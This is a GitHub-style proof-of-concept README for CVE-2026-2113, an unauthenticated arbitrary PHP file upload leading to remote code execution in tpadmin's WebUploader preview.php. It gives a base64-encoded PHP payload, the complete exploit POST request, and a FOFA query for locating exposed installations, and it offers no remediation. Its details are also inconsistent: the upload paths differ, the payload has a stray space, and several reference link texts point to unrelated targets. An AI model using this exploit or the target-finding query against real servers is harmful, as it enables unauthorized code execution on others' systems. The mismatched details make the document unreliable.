# tpadmin-CVE-2026-2113-poc

A proof-of-concept exploiting a Remote Code Execution with web server privileges via Arbitrary File Upload.

# Vulnerability Description

A critical Remote Code Execution vulnerability exists in H-ui.admin system's WebUploader preview component. The `<font style="color:rgb(15, 17, 21);background-color:rgb(235, 238, 242);">/public/static/admin/lib/webuploader/0.1.5/server/preview.php</font>` file lacks proper authentication and file validation, allowing unauthenticated attackers to upload arbitrary PHP files directly to the web server. This results in immediate Remote Code Execution with web server privileges.

# Affected Versions

- tpadmin up to version 1.3.12

# Poc (by sTy1H)

1. Construct payload (Encode the dangerous statement in base64)
```bash
printf "<? php phpinfo();?>" | base64
PD9waHAgcGhwaW5mbygpOz8+
```

2. Construct the POST request with our payload
```html
POST /admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+
```
3. Visit the returned url

<img width="800" height="600" alt="image" src="https://github.com/user-attachments/assets/beaa331e-0553-4b71-b4bc-a38dcbd759e5" />

# Into the wild

FOFA:

```
title='Tpadmin'
```

# Impact

An unauthenticated remote attacker can exploit an Arbitrary File Upload to gain an RCE with web server privileges.

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P - 6.9:Medium

# Remediation & Mitigation

There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.

# References

- https://github.com/yuan1994/tpAdmin
- [https://www.smartertools.com/smartermail/release-notes/current](https://www.cve.org/CVERecord?id=CVE-2026-2113))
- [https://nvd.nist.gov/vuln/detail/CVE-2026-23760](https://github.com/sTy1H/CVE-Report/blob/main/Remote%20Code%20Execution%20Vulnerability%20in%20Tpadmin%20System.md)